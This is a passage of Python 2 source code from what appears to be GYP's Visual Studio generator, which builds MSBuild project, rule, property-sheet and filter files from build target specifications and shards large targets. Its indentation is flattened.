config_platform_overrides[config_fullname] = fixed_config_fullname
return config_platform_overrides
def _CreateProjectObjects(target_list, target_dicts, options, msvs_version):
"""Create a MSVSProject object for the targets found in target list.
Arguments:
target_list: the list of targets to generate project objects for.
target_dicts: the dictionary of specifications.
options: global generator options.
msvs_version: the MSVSVersion object.
Returns:
A set of created projects, keyed by target.
"""
global fixpath_prefix
# Generate each project.
projects = {}
for qualified_target in target_list:
spec = target_dicts[qualified_target]
if spec['toolset'] != 'target':
raise Exception(
'Multiple toolsets not supported in msvs build (target %s)' %
qualified_target)
proj_path, fixpath_prefix = _GetPathOfProject(qualified_target, spec,
options, msvs_version)
guid = _GetGuidOfProject(proj_path, spec)
overrides = _GetPlatformOverridesOfProject(spec)
build_file = gyp.common.BuildFile(qualified_target)
# Create object for this project.
obj = MSVSNew.MSVSProject(
_FixPath(proj_path),
name=spec['target_name'],
guid=guid,
spec=spec,
build_file=build_file,
config_platform_overrides=overrides,
fixpath_prefix=fixpath_prefix)
projects[qualified_target] = obj
# Set all the dependencies
for project in projects.values():
deps = project.spec.get('dependencies', [])
deps = [projects[d] for d in deps]
project.set_dependencies(deps)
return projects
def CalculateVariables(default_variables, params):
"""Generated variables that require params to be known."""
generator_flags = params.get('generator_flags', {})
# Select project file format version (if unset, default to auto detecting).
msvs_version = MSVSVersion.SelectVisualStudioVersion(
generator_flags.get('msvs_version', 'auto'))
# Stash msvs_version for later (so we don't have to probe the system twice).
params['msvs_version'] = msvs_version
# Set a variable so conditions can be based on msvs_version.
default_variables['MSVS_VERSION'] = msvs_version.ShortName()
# To determine processor word size on Windows, in addition to checking
# PROCESSOR_ARCHITECTURE (which reflects the word size of the current
  # process), it is also necessary to check PROCESSOR_ARCHITEW6432 (which
  # contains the actual word size of the system when running through WOW64).
if (os.environ.get('PROCESSOR_ARCHITECTURE', '').find('64') >= 0 or
os.environ.get('PROCESSOR_ARCHITEW6432', '').find('64') >= 0):
default_variables['MSVS_OS_BITS'] = 64
else:
default_variables['MSVS_OS_BITS'] = 32
def _ShardName(name, number):
"""Add a shard number to the end of a target.
Arguments:
name: name of the target (foo#target)
number: shard number
Returns:
Target name with shard added (foo_1#target)
"""
parts = name.rsplit('#', 1)
parts[0] = '%s_%d' % (parts[0], number)
return '#'.join(parts)
def _ShardTargets(target_list, target_dicts):
"""Shard some targets apart to work around the linkers limits.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
Returns:
Tuple of the new sharded versions of the inputs.
"""
# Gather the targets to shard, and how many pieces.
targets_to_shard = {}
for t in target_dicts:
shards = int(target_dicts[t].get('msvs_shard', 0))
if shards:
targets_to_shard[t] = shards
# Shard target_list.
new_target_list = []
for t in target_list:
if t in targets_to_shard:
for i in range(targets_to_shard[t]):
new_target_list.append(_ShardName(t, i))
else:
new_target_list.append(t)
# Shard target_dict.
new_target_dicts = {}
for t in target_dicts:
if t in targets_to_shard:
for i in range(targets_to_shard[t]):
name = _ShardName(t, i)
new_target_dicts[name] = copy.copy(target_dicts[t])
new_target_dicts[name]['target_name'] = _ShardName(
new_target_dicts[name]['target_name'], i)
sources = new_target_dicts[name].get('sources', [])
new_sources = []
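        # Distribute sources round-robin across the shards: shard i takes
        # sources i, i+N, i+2N, ... where N is the shard count.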
for pos in range(i, len(sources), targets_to_shard[t]):
new_sources.append(sources[pos])
new_target_dicts[name]['sources'] = new_sources
else:
new_target_dicts[t] = target_dicts[t]
# Shard dependencies.
for t in new_target_dicts:
dependencies = copy.copy(new_target_dicts[t].get('dependencies', []))
new_dependencies = []
for d in dependencies:
if d in targets_to_shard:
for i in range(targets_to_shard[d]):
new_dependencies.append(_ShardName(d, i))
else:
new_dependencies.append(d)
new_target_dicts[t]['dependencies'] = new_dependencies
return (new_target_list, new_target_dicts)
def GenerateOutput(target_list, target_dicts, data, params):
"""Generate .sln and .vcproj files.
This is the entry point for this generator.
Arguments:
target_list: List of target pairs: 'base/base.gyp:base'.
target_dicts: Dict of target properties keyed on target pair.
data: Dictionary containing per .gyp data.
"""
global fixpath_prefix
options = params['options']
# Get the project file format version back out of where we stashed it in
# GeneratorCalculatedVariables.
msvs_version = params['msvs_version']
# Optionally shard targets marked with 'msvs_shard': SHARD_COUNT.
(target_list, target_dicts) = _ShardTargets(target_list, target_dicts)
# Prepare the set of configurations.
configs = set()
for qualified_target in target_list:
spec = target_dicts[qualified_target]
for config_name, config in spec['configurations'].iteritems():
configs.add(_ConfigFullName(config_name, config))
configs = list(configs)
# Figure out all the projects that will be generated and their guids
project_objects = _CreateProjectObjects(target_list, target_dicts, options,
msvs_version)
# Generate each project.
for project in project_objects.values():
fixpath_prefix = project.fixpath_prefix
_GenerateProject(project, options, msvs_version)
fixpath_prefix = None
for build_file in data:
# Validate build_file extension
if build_file[-4:] != '.gyp':
continue
sln_path = build_file[:-4] + options.suffix + '.sln'
if options.generator_output:
sln_path = os.path.join(options.generator_output, sln_path)
# Get projects in the solution, and their dependents.
sln_projects = gyp.common.BuildFileTargets(target_list, build_file)
sln_projects += gyp.common.DeepDependencyTargets(target_dicts, sln_projects)
# Create folder hierarchy.
root_entries = _GatherSolutionFolders(
sln_projects, project_objects, flat=msvs_version.FlatSolution())
# Create solution.
sln = MSVSNew.MSVSSolution(sln_path,
entries=root_entries,
variants=configs,
websiteProperties=False,
version=msvs_version)
sln.Write()
def _GenerateMSBuildFiltersFile(filters_path, source_files,
extension_to_rule_name):
"""Generate the filters file.
This file is used by Visual Studio to organize the presentation of source
files into folders.
Arguments:
filters_path: The path of the file to be created.
source_files: The hierarchical structure of all the sources.
extension_to_rule_name: A dictionary mapping file extensions to rules.
"""
filter_group = []
source_group = []
_AppendFiltersForMSBuild('', source_files, extension_to_rule_name,
filter_group, source_group)
if filter_group:
content = ['Project',
{'ToolsVersion': '4.0',
'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
},
['ItemGroup'] + filter_group,
['ItemGroup'] + source_group
]
easy_xml.WriteXmlIfChanged(content, filters_path)
elif os.path.exists(filters_path):
# We don't need this filter anymore. Delete the old filter file.
os.unlink(filters_path)
def _AppendFiltersForMSBuild(parent_filter_name, sources,
extension_to_rule_name,
filter_group, source_group):
"""Creates the list of filters and sources to be added in the filter file.
Args:
parent_filter_name: The name of the filter under which the sources are
found.
sources: The hierarchy of filters and sources to process.
extension_to_rule_name: A dictionary mapping file extensions to rules.
filter_group: The list to which filter entries will be appended.
    source_group: The list to which source entries will be appended.
"""
for source in sources:
if isinstance(source, MSVSProject.Filter):
# We have a sub-filter. Create the name of that sub-filter.
if not parent_filter_name:
filter_name = source.name
else:
filter_name = '%s\\%s' % (parent_filter_name, source.name)
# Add the filter to the group.
filter_group.append(
['Filter', {'Include': filter_name},
['UniqueIdentifier', MSVSNew.MakeGuid(source.name)]])
# Recurse and add its dependents.
_AppendFiltersForMSBuild(filter_name, source.contents,
extension_to_rule_name,
filter_group, source_group)
else:
# It's a source. Create a source entry.
_, element = _MapFileToMsBuildSourceType(source, extension_to_rule_name)
source_entry = [element, {'Include': source}]
# Specify the filter it is part of, if any.
if parent_filter_name:
source_entry.append(['Filter', parent_filter_name])
source_group.append(source_entry)
def _MapFileToMsBuildSourceType(source, extension_to_rule_name):
"""Returns the group and element type of the source file.
Arguments:
source: The source file name.
extension_to_rule_name: A dictionary mapping file extensions to rules.
Returns:
A pair of (group this file should be part of, the label of element)
"""
_, ext = os.path.splitext(source)
if ext in ['.cc', '.cpp', '.c', '.cxx']:
group = 'compile'
element = 'ClCompile'
elif ext in ['.h', '.hxx']:
group = 'include'
element = 'ClInclude'
elif ext == '.rc':
group = 'resource'
element = 'ResourceCompile'
elif ext == '.idl':
group = 'midl'
element = 'Midl'
elif ext in extension_to_rule_name:
group = 'rule'
element = extension_to_rule_name[ext]
else:
group = 'none'
element = 'None'
return (group, element)
def _GenerateRulesForMSBuild(output_dir, options, spec,
sources, excluded_sources,
props_files_of_rules, targets_files_of_rules,
actions_to_add, extension_to_rule_name):
# MSBuild rules are implemented using three files: an XML file, a .targets
# file and a .props file.
# See http://blogs.msdn.com/b/vcblog/archive/2010/04/21/quick-help-on-vs2010-custom-build-rule.aspx
# for more details.
rules = spec.get('rules', [])
rules_native = [r for r in rules if not int(r.get('msvs_external_rule', 0))]
rules_external = [r for r in rules if int(r.get('msvs_external_rule', 0))]
msbuild_rules = []
for rule in rules_native:
msbuild_rule = MSBuildRule(rule, spec)
msbuild_rules.append(msbuild_rule)
extension_to_rule_name[msbuild_rule.extension] = msbuild_rule.rule_name
if msbuild_rules:
base = spec['target_name'] + options.suffix
props_name = base + '.props'
targets_name = base + '.targets'
xml_name = base + '.xml'
props_files_of_rules.add(props_name)
targets_files_of_rules.add(targets_name)
props_path = os.path.join(output_dir, props_name)
targets_path = os.path.join(output_dir, targets_name)
xml_path = os.path.join(output_dir, xml_name)
_GenerateMSBuildRulePropsFile(props_path, msbuild_rules)
_GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules)
_GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules)
if rules_external:
_GenerateExternalRules(rules_external, output_dir, spec,
sources, options, actions_to_add)
_AdjustSourcesForRules(rules, sources, excluded_sources)
class MSBuildRule(object):
"""Used to store information used to generate an MSBuild rule.
Attributes:
rule_name: The rule name, sanitized to use in XML.
target_name: The name of the target.
after_targets: The name of the AfterTargets element.
before_targets: The name of the BeforeTargets element.
depends_on: The name of the DependsOn element.
compute_output: The name of the ComputeOutput element.
dirs_to_make: The name of the DirsToMake element.
tlog: The name of the _tlog element.
extension: The extension this rule applies to.
description: The message displayed when this rule is invoked.
additional_dependencies: A string listing additional dependencies.
outputs: The outputs of this rule.
command: The command used to run the rule.
"""
def __init__(self, rule, spec):
self.display_name = rule['rule_name']
    # Sanitize the rule name: replace any non-word character with '_' so the
    # name can be used in XML element names.
self.rule_name = re.sub(r'\W', '_', self.display_name)
# Create the various element names, following the example set by the
# Visual Studio 2008 to 2010 conversion. I don't know if VS2010
# is sensitive to the exact names.
self.target_name = '_' + self.rule_name
self.after_targets = self.rule_name + 'AfterTargets'
self.before_targets = self.rule_name + 'BeforeTargets'
self.depends_on = self.rule_name + 'DependsOn'
self.compute_output = 'Compute%sOutput' % self.rule_name
self.dirs_to_make = self.rule_name + 'DirsToMake'
self.tlog = self.rule_name + '_tlog'
self.extension = rule['extension']
if not self.extension.startswith('.'):
self.extension = '.' + self.extension
self.description = MSVSSettings.ConvertVCMacrosToMSBuild(
rule.get('message', self.rule_name))
old_additional_dependencies = _FixPaths(rule.get('inputs', []))
self.additional_dependencies = (
';'.join([MSVSSettings.ConvertVCMacrosToMSBuild(i)
for i in old_additional_dependencies]))
old_outputs = _FixPaths(rule.get('outputs', []))
self.outputs = ';'.join([MSVSSettings.ConvertVCMacrosToMSBuild(i)
for i in old_outputs])
old_command = _BuildCommandLineForRule(spec, rule, has_input_path=True)
self.command = MSVSSettings.ConvertVCMacrosToMSBuild(old_command)
def _GenerateMSBuildRulePropsFile(props_path, msbuild_rules):
"""Generate the .props file."""
content = ['Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'}]
for rule in msbuild_rules:
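    # Each rule contributes: default Before/After target hooks (used unless
    # the project overrides them or is a Makefile configuration), a DependsOn
    # property, and an ItemDefinitionGroup holding the command line, outputs,
    # description and additional dependencies.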
content.extend([
['PropertyGroup',
{'Condition': "'$(%s)' == '' and '$(%s)' == '' and "
"'$(ConfigurationType)' != 'Makefile'" % (rule.before_targets,
rule.after_targets)
},
[rule.before_targets, 'Midl'],
[rule.after_targets, 'CustomBuild'],
],
['PropertyGroup',
[rule.depends_on,
{'Condition': "'$(ConfigurationType)' != 'Makefile'"},
'_SelectedFiles;$(%s)' % rule.depends_on
],
],
['ItemDefinitionGroup',
[rule.rule_name,
['CommandLineTemplate', rule.command],
['Outputs', rule.outputs],
['ExecutionDescription', rule.description],
['AdditionalDependencies', rule.additional_dependencies],
],
]
])
easy_xml.WriteXmlIfChanged(content, props_path)
def _GenerateMSBuildRuleTargetsFile(targets_path, msbuild_rules):
"""Generate the .targets file."""
content = ['Project',
{'xmlns': 'http://schemas.microsoft.com/developer/msbuild/2003'
}
]
item_group = [
'ItemGroup',
['PropertyPageSchema',
{'Include': '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'}
]
]
for rule in msbuild_rules:
item_group.append(
['AvailableItemName',
{'Include': rule.rule_name},
['Targets', rule.target_name],
])
content.append(item_group)
for rule in msbuild_rules:
content.append(
['UsingTask',
{'TaskName': rule.rule_name,
'TaskFactory': 'XamlTaskFactory',
'AssemblyName': 'Microsoft.Build.Tasks.v4.0'
},
['Task', '$(MSBuildThisFileDirectory)$(MSBuildThisFileName).xml'],
])
for rule in msbuild_rules:
rule_name = rule.rule_name
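    # '%%' escapes the percent sign for Python string formatting; the output
    # is MSBuild item-metadata syntax such as %(MyRule.Outputs).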
target_outputs = '%%(%s.Outputs)' % rule_name
target_inputs = ('%%(%s.Identity);%%(%s.AdditionalDependencies);'
'$(MSBuildProjectFile)') % (rule_name, rule_name)
rule_inputs = '%%(%s.Identity)' % rule_name
extension_condition = ("'%(Extension)'=='.obj' or "
"'%(Extension)'=='.res' or "
"'%(Extension)'=='.rsc' or "
"'%(Extension)'=='.lib'")
remove_section = [
'ItemGroup',
{'Condition': "'@(SelectedFiles)' != ''"},
[rule_name,
{'Remove': '@(%s)' % rule_name,
'Condition': "'%(Identity)' != '@(SelectedFiles)'"
}
]
]
logging_section = [
'ItemGroup',
[rule.tlog,
{'Include': '%%(%s.Outputs)' % rule_name,
'Condition': ("'%%(%s.Outputs)' != '' and "
"'%%(%s.ExcludedFromBuild)' != 'true'" %
(rule_name, rule_name))
},
['Source', "@(%s, '|')" % rule_name],
],
]
message_section = [
'Message',
{'Importance': 'High',
'Text': '%%(%s.ExecutionDescription)' % rule_name
}
]
write_lines_section = [
'WriteLinesToFile',
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule.tlog, rule.tlog),
'File': '$(IntDir)$(ProjectName).write.1.tlog',
'Lines': "^%%(%s.Source);@(%s->'%%(Fullpath)')" % (rule.tlog,
rule.tlog)
}
]
command_and_input_section = [
rule_name,
{'Condition': "'@(%s)' != '' and '%%(%s.ExcludedFromBuild)' != "
"'true'" % (rule_name, rule_name),
'CommandLineTemplate': '%%(%s.CommandLineTemplate)' % rule_name,
'AdditionalOptions': '%%(%s.AdditionalOptions)' % rule_name,
'Inputs': rule_inputs
}
]
content.extend([
['Target',
{'Name': rule.target_name,
'BeforeTargets': '$(%s)' % rule.before_targets,
'AfterTargets': '$(%s)' % rule.after_targets,
'Condition': "'@(%s)' != ''" % rule_name,
'DependsOnTargets': '$(%s);%s' % (rule.depends_on,
rule.compute_output),
'Outputs': target_outputs,
'Inputs': target_inputs
},
remove_section,
logging_section,
message_section,
write_lines_section,
command_and_input_section,
],
['PropertyGroup',
['ComputeLinkInputsTargets',
'$(ComputeLinkInputsTargets);',
'%s;' % rule.compute_output
],
['ComputeLibInputsTargets',
'$(ComputeLibInputsTargets);',
'%s;' % rule.compute_output
],
],
['Target',
{'Name': rule.compute_output,
'Condition': "'@(%s)' != ''" % rule_name
},
['ItemGroup',
[rule.dirs_to_make,
{'Condition': "'@(%s)' != '' and "
"'%%(%s.ExcludedFromBuild)' != 'true'" % (rule_name, rule_name),
'Include': '%%(%s.Outputs)' % rule_name
}
],
['Link',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
['Lib',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
['ImpLib',
{'Include': '%%(%s.Identity)' % rule.dirs_to_make,
'Condition': extension_condition
}
],
],
['MakeDir',
{'Directories': ("@(%s->'%%(RootDir)%%(Directory)')" %
rule.dirs_to_make)
}
]
],
])
easy_xml.WriteXmlIfChanged(content, targets_path)
def _GenerateMSBuildRuleXmlFile(xml_path, msbuild_rules):
# Generate the .xml file
content = [
'ProjectSchemaDefinitions',
{'xmlns': ('clr-namespace:Microsoft.Build.Framework.XamlTypes;'
'assembly=Microsoft.Build.Framework'),
'xmlns:x': 'http://schemas.microsoft.com/winfx/2006/xaml',
'xmlns:sys': 'clr-namespace:System;assembly=mscorlib',
'xmlns:transformCallback':
'Microsoft.Cpp.Dev10.ConvertPropertyCallback'
}
]
for rule in msbuild_rules:
content.extend([
['Rule',
{'Name': rule.rule_name,
'PageTemplate': 'tool',
'DisplayName': rule.display_name,
'Order': '200'
},
['Rule.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': rule.rule_name
}
]
],
['Rule.Categories',
['Category',
{'Name': 'General'},
['Category.DisplayName',
['sys:String', 'General'],
],
],
['Category',
{'Name': 'Command Line',
'Subtype': 'CommandLine'
},
['Category.DisplayName',
['sys:String', 'Command Line'],
],
],
],
['StringListProperty',
{'Name': 'Inputs',
'Category': 'Command Line',
'IsRequired': 'true',
'Switch': ' '
},
['StringListProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': rule.rule_name,
'SourceType': 'Item'
}
]
],
],
['StringProperty',
{'Name': 'CommandLineTemplate',
'DisplayName': 'Command Line',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['DynamicEnumProperty',
{'Name': rule.before_targets,
'Category': 'General',
'EnumProvider': 'Targets',
'IncludeInCommandLine': 'False'
},
['DynamicEnumProperty.DisplayName',
['sys:String', 'Execute Before'],
],
['DynamicEnumProperty.Description',
['sys:String', 'Specifies the targets for the build customization'
' to run before.'
],
],
['DynamicEnumProperty.ProviderSettings',
['NameValuePair',
{'Name': 'Exclude',
'Value': '^%s|^Compute' % rule.before_targets
}
]
],
['DynamicEnumProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'HasConfigurationCondition': 'true'
}
]
],
],
['DynamicEnumProperty',
{'Name': rule.after_targets,
'Category': 'General',
'EnumProvider': 'Targets',
'IncludeInCommandLine': 'False'
},
['DynamicEnumProperty.DisplayName',
['sys:String', 'Execute After'],
],
['DynamicEnumProperty.Description',
['sys:String', ('Specifies the targets for the build customization'
' to run after.')
],
],
['DynamicEnumProperty.ProviderSettings',
['NameValuePair',
{'Name': 'Exclude',
'Value': '^%s|^Compute' % rule.after_targets
}
]
],
['DynamicEnumProperty.DataSource',
['DataSource',
{'Persistence': 'ProjectFile',
'ItemType': '',
'HasConfigurationCondition': 'true'
}
]
],
],
['StringListProperty',
{'Name': 'Outputs',
'DisplayName': 'Outputs',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['StringProperty',
{'Name': 'ExecutionDescription',
'DisplayName': 'Execution Description',
'Visible': 'False',
'IncludeInCommandLine': 'False'
}
],
['StringListProperty',
{'Name': 'AdditionalDependencies',
'DisplayName': 'Additional Dependencies',
'IncludeInCommandLine': 'False',
'Visible': 'false'
}
],
['StringProperty',
{'Subtype': 'AdditionalOptions',
'Name': 'AdditionalOptions',
'Category': 'Command Line'
},
['StringProperty.DisplayName',
['sys:String', 'Additional Options'],
],
['StringProperty.Description',
['sys:String', 'Additional Options'],
],
],
],
['ItemType',
{'Name': rule.rule_name,
'DisplayName': rule.display_name
}
],
['FileExtension',
{'Name': '*' + rule.extension,
'ContentType': rule.rule_name
}
],
['ContentType',
{'Name': rule.rule_name,
'DisplayName': '',
'ItemType': rule.rule_name
}
]
])
easy_xml.WriteXmlIfChanged(content, xml_path)
def _GetConfigurationAndPlatform(name, settings):
configuration = name.rsplit('_', 1)[0]
platform = settings.get('msvs_configuration_platform', 'Win32')
return (configuration, platform)
def _GetConfigurationCondition(name, settings):
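  # Produces a condition such as "'$(Configuration)|$(Platform)'=='Debug|Win32'".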
return (r"'$(Configuration)|$(Platform)'=='%s|%s'" %
_GetConfigurationAndPlatform(name, settings))
def _GetMSBuildProjectConfigurations(configurations):
group = ['ItemGroup', {'Label': 'ProjectConfigurations'}]
for (name, settings) in sorted(configurations.iteritems()):
configuration, platform = _GetConfigurationAndPlatform(name, settings)
designation = '%s|%s' % (configuration, platform)
group.append(
['ProjectConfiguration', {'Include': designation},
['Configuration', configuration],
['Platform', platform]])
return [group]
def _GetMSBuildGlobalProperties(spec, guid, gyp_file_name):
prefix = spec.get('product_prefix', '')
product_name = spec.get('product_name', '$(ProjectName)')
target_name = prefix + product_name
namespace = os.path.splitext(gyp_file_name)[0]
return [
['PropertyGroup', {'Label': 'Globals'},
['ProjectGuid', guid],
['Keyword', 'Win32Proj'],
['RootNamespace', namespace],
['TargetName', target_name],
]
]
def _GetMSBuildConfigurationDetails(spec, build_file):
properties = {}
for name, settings in spec['configurations'].iteritems():
msbuild_attributes = _GetMSBuildAttributes(spec, settings, build_file)
condition = _GetConfigurationCondition(name, settings)
character_set = msbuild_attributes.get('CharacterSet')
_AddConditionalProperty(properties, condition, 'ConfigurationType',
msbuild_attributes['ConfigurationType'])
if character_set:
_AddConditionalProperty(properties, condition, 'CharacterSet',
character_set)
return _GetMSBuildPropertyGroup(spec, 'Configuration', properties)
def _GetMSBuildPropertySheets(configurations):
user_props = r'$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props'
return [
['ImportGroup',
{'Label': 'PropertySheets'},
['Import',
{'Project': user_props,
'Condition': "exists('%s')" % user_props,
'Label': 'LocalAppDataPlatform'
}
]
]
]
def _GetMSBuildAttributes(spec, config, build_file):
# Use the MSVS attributes and convert them. In the future, we may want to
# support Gyp files specifying 'msbuild_configuration_attributes' directly.
config_type = _GetMSVSConfigurationType(spec, build_file)
msvs_attributes = _GetMSVSAttributes(spec, config, config_type)
msbuild_attributes = {}
for a in msvs_attributes:
if a in ['IntermediateDirectory', 'OutputDirectory']:
directory = MSVSSettings.ConvertVCMacrosToMSBuild(msvs_attributes[a])
if not directory.endswith('\\'):
directory += '\\'
msbuild_attributes[a] = directory
elif a == 'CharacterSet':
msbuild_attributes[a] = {
'0': 'MultiByte',
'1': 'Unicode'
}[msvs_attributes[a]]
elif a == 'ConfigurationType':
msbuild_attributes[a] = {
'1': 'Application',
'2': 'DynamicLibrary',
'4': 'StaticLibrary',
'10': 'Utility'
}[msvs_attributes[a]]
else:
print 'Warning: Do not know how to convert MSVS attribute ' + a
return msbuild_attributes
def _GetMSBuildConfigurationGlobalProperties(spec, configurations, build_file):
# TODO(jeanluc) We could optimize out the following and do it only if
# there are actions.
# TODO(jeanluc) Handle the equivalent of setting 'CYGWIN=nontsec'.
new_paths = []
cygwin_dirs = spec.get('msvs_cygwin_dirs', ['.'])[0]
if cygwin_dirs:
cyg_path = '$(MSBuildProjectDirectory)\\%s\\bin\\' % _FixPath(cygwin_dirs)
new_paths.append(cyg_path)
# TODO(jeanluc) Change the convention to have both a cygwin_dir and a
# python_dir.
python_path = cyg_path.replace('cygwin\\bin', 'python_26')
new_paths.append(python_path)
if new_paths:
new_paths = '$(ExecutablePath);' + ';'.join(new_paths)
properties = {}
for (name, configuration) in sorted(configurations.iteritems()):
condition = _GetConfigurationCondition(name, configuration)
attributes = _GetMSBuildAttributes(spec, configuration, build_file)
msbuild_settings = configuration['finalized_msbuild_settings']
_AddConditionalProperty(properties, condition, 'IntDir',
attributes['IntermediateDirectory'])
_AddConditionalProperty(properties, condition, 'OutDir',
attributes['OutputDirectory'])
if new_paths:
_AddConditionalProperty(properties, condition, 'ExecutablePath',
new_paths)
tool_settings = msbuild_settings.get('', {})
for name, value in sorted(tool_settings.iteritems()):
formatted_value = _GetValueFormattedForMSBuild('', name, value)
_AddConditionalProperty(properties, condition, name, formatted_value)
return _GetMSBuildPropertyGroup(spec, None, properties)
def _AddConditionalProperty(properties, condition, name, value):
"""Adds a property / conditional value pair to a dictionary.
Arguments:
properties: The dictionary to be modified. The key is the name of the
property. The value is itself a dictionary; its key is the value and
        the value is a list of conditions for which this value is true.
condition: The condition under which the named property has the value.
name: The name of the property.
value: The value of the property.
"""
if name not in properties:
properties[name] = {}
values = properties[name]
if value not in values:
values[value] = []
conditions = values[value]
conditions.append(condition)
def _GetMSBuildPropertyGroup(spec, label, properties):
"""Returns a PropertyGroup definition for the specified properties.
Arguments:
spec: The target project dict.
label: An optional label for the PropertyGroup.
properties: The dictionary to be converted. The key is the name of the
property. The value is itself a dictionary; its key is the value and
        the value is a list of conditions for which this value is true.
"""
group = ['PropertyGroup']
if label:
group.append({'Label': label})
num_configurations = len(spec['configurations'])
for name, values in sorted(properties.iteritems()):
for value, conditions in sorted(values.iteritems()):
if len(conditions) == num_configurations:
        # If the value is the same for all configurations, just add one
        # unconditional entry.
group.append([name, value])
else:
for condition in conditions:
group.append([name, {'Condition': condition}, value])
return [group]
def _GetMSBuildToolSettingsSections(spec, configurations):
groups = []
for (name, configuration) in sorted(configurations.iteritems()):
msbuild_settings = configuration['finalized_msbuild_settings']
group = ['ItemDefinitionGroup',
{'Condition': _GetConfigurationCondition(name, configuration)}
]
for tool_name, tool_settings in sorted(msbuild_settings.iteritems()):
# Skip the tool named '' which is a holder of global settings handled
# by _GetMSBuildConfigurationGlobalProperties.
if tool_name:
if tool_settings:
tool = [tool_name]
for name, value in sorted(tool_settings.iteritems()):
formatted_value = _GetValueFormattedForMSBuild(tool_name, name,
value)
tool.append([name, formatted_value])
group.append(tool)
groups.append(group)
return groups
def _FinalizeMSBuildSettings(spec, configuration):
if 'msbuild_settings' in configuration:
converted = False
msbuild_settings = configuration['msbuild_settings']
MSVSSettings.ValidateMSBuildSettings(msbuild_settings)
else:
converted = True
msvs_settings = configuration.get('msvs_settings', {})
msbuild_settings = MSVSSettings.ConvertToMSBuildSettings(msvs_settings)
include_dirs, resource_include_dirs = _GetIncludeDirs(configuration)
libraries = _GetLibraries(spec)
out_file, _, msbuild_tool = _GetOutputFilePathAndTool(spec)
defines = _GetDefines(configuration)
if converted:
# Visual Studio 2010 has TR1
defines = [d for d in defines if d != '_HAS_TR1=0']
# Warn of ignored settings
ignored_settings = ['msvs_prebuild', 'msvs_postbuild', 'msvs_tool_files']
for ignored_setting in ignored_settings:
value = configuration.get(ignored_setting)
if value:
print ('Warning: The automatic conversion to MSBuild does not handle '
'%s. Ignoring setting of %s' % (ignored_setting, str(value)))
defines = [_EscapeCppDefineForMSBuild(d) for d in defines]
disabled_warnings = _GetDisabledWarnings(configuration)
# TODO(jeanluc) Validate & warn that we don't translate
# prebuild = configuration.get('msvs_prebuild')
# postbuild = configuration.get('msvs_postbuild')
def_file = _GetModuleDefinition(spec)
precompiled_header = configuration.get('msvs_precompiled_header')
# Add the information to the appropriate tool
# TODO(jeanluc) We could optimize and generate these settings only if
# the corresponding files are found, e.g. don't generate ResourceCompile
# if you don't have any resources.
_ToolAppend(msbuild_settings, 'ClCompile',
'AdditionalIncludeDirectories', include_dirs)
_ToolAppend(msbuild_settings, 'ResourceCompile',
'AdditionalIncludeDirectories', resource_include_dirs)
# Add in libraries.
_ToolAppend(msbuild_settings, 'Link', 'AdditionalDependencies', libraries)
if out_file:
_ToolAppend(msbuild_settings, msbuild_tool, 'OutputFile', out_file,
only_if_unset=True)
# Add defines.
_ToolAppend(msbuild_settings, 'ClCompile',
'PreprocessorDefinitions', defines)
_ToolAppend(msbuild_settings, 'ResourceCompile',
'PreprocessorDefinitions', defines)
# Add disabled warnings.
_ToolAppend(msbuild_settings, 'ClCompile',
'DisableSpecificWarnings', disabled_warnings)
# Turn on precompiled headers if appropriate.
if precompiled_header:
precompiled_header = os.path.split(precompiled_header)[1]
_ToolAppend(msbuild_settings, 'ClCompile', 'PrecompiledHeader', 'Use')
_ToolAppend(msbuild_settings, 'ClCompile',
'PrecompiledHeaderFile', precompiled_header)
_ToolAppend(msbuild_settings, 'ClCompile',
'ForcedIncludeFiles', precompiled_header)
# Loadable modules don't generate import libraries;
# tell dependent projects to not expect one.
if spec['type'] == 'loadable_module':
_ToolAppend(msbuild_settings, '', 'IgnoreImportLibrary', 'true')
# Set the module definition file if any.
if def_file:
_ToolAppend(msbuild_settings, 'Link', 'ModuleDefinitionFile', def_file)
configuration['finalized_msbuild_settings'] = msbuild_settings
def _GetValueFormattedForMSBuild(tool_name, name, value):
if type(value) == list:
    # For some settings, VS2010 does not automatically extend the settings
# TODO(jeanluc) Is this what we want?
if name in ['AdditionalDependencies',
'AdditionalIncludeDirectories',
'AdditionalLibraryDirectories',
'AdditionalOptions',
'DelayLoadDLLs',
'DisableSpecificWarnings',
'PreprocessorDefinitions']:
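      # Appending the item macro (e.g. '%(PreprocessorDefinitions)') tells
      # MSBuild to merge these values with inherited defaults rather than
      # replace them.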
value.append('%%(%s)' % name)
# For most tools, entries in a list should be separated with ';' but some
# settings use a space. Check for those first.
exceptions = {
'ClCompile': ['AdditionalOptions'],
'Link': ['AdditionalOptions'],
'Lib': ['AdditionalOptions']}
if tool_name in exceptions and name in exceptions[tool_name]:
char = ' '
else:
char = ';'
formatted_value = char.join(
[MSVSSettings.ConvertVCMacrosToMSBuild(i) for i in value])
else:
formatted_value = MSVSSettings.ConvertVCMacrosToMSBuild(value)
return formatted_value
def _VerifySourcesExist(sources, root_dir):
"""Verifies that all source files exist on disk.
Checks that all regular source files, i.e. not created at run time,
exist on disk. Missing files cause needless recompilation but no otherwise
visible errors.
Arguments:
sources: A recursive list of Filter/file names.
root_dir: The root directory for the relative path names.
"""
for source in sources:
if isinstance(source, MSVSProject.Filter):
_VerifySourcesExist(source.contents, root_dir)
else:
if '$' not in source:
full_path = os.path.join(root_dir, source)
if not os.path.exists(full_path):
print 'Warning: Missing input file ' + full_path + ' pwd=' +\
os.getcwd()
def _GetMSBuildSources(spec, sources, exclusions, extension_to_rule_name,
actions_spec, sources_handled_by_action):
groups = ['none', 'midl', 'include', 'compile', 'resource', 'rule']
grouped_sources = {}
